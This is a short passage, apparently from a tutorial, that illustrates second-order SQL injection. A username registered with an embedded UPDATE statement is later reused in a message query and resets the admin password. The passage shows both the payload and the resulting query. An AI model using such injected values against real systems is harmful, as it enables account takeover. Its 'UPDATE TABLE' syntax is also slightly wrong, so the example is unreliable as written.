Example 2 (continued)

Example: Changing the admins password

Registering with username

user: '; UPDATE TABLE users SET password='newpwd' WHERE user='admin'-- -
password: whatever

And then when searching for messages sent to the user we access $_SESSION["user"] :

SELECT * FROM messages WHERE receiver = '';
UPDATE TABLE users SET password = 'newpwd' WHERE user = 'admin'
-- -' AND content LIKE '%%'

(The second query line was stored in the username)